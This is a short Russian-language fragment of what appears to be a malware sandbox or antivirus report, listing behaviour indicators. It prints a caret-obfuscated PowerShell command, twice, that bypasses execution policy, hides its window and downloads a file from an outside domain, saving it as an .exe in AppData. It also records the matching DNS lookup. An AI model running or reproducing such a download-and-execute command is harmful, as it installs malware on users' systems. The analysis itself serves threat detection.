Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^e^Rs^HeLl.e^X^e ^-E^x^E^c^UtIonP^OLi^C^y BY^pas^S -^n^O^p^r^oF^I^lE ^-^Wi^NDOW^StY^LE HID^d^en (NEw-Ob^je^cT^ Sy^s^tEm^.nET.W^E^BC^LI^en^T).^dOwN^LOADF^ile^(^'http://www.door...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "PoW^e^Rs^HeLl.e^X^e ^-E^x^E^c^UtIonP^OLi^C^y BY^pas^S -^n^O^p^r^oF^I^lE ^-^Wi^NDOW^StY^LE HID^d^en (NEw-Ob^je^cT^ Sy^s^tEm^.nET.W^E^BC^LI^en^T).^dOwN^LOADF^ile^(^'http://www.door...' (со скрытым окном)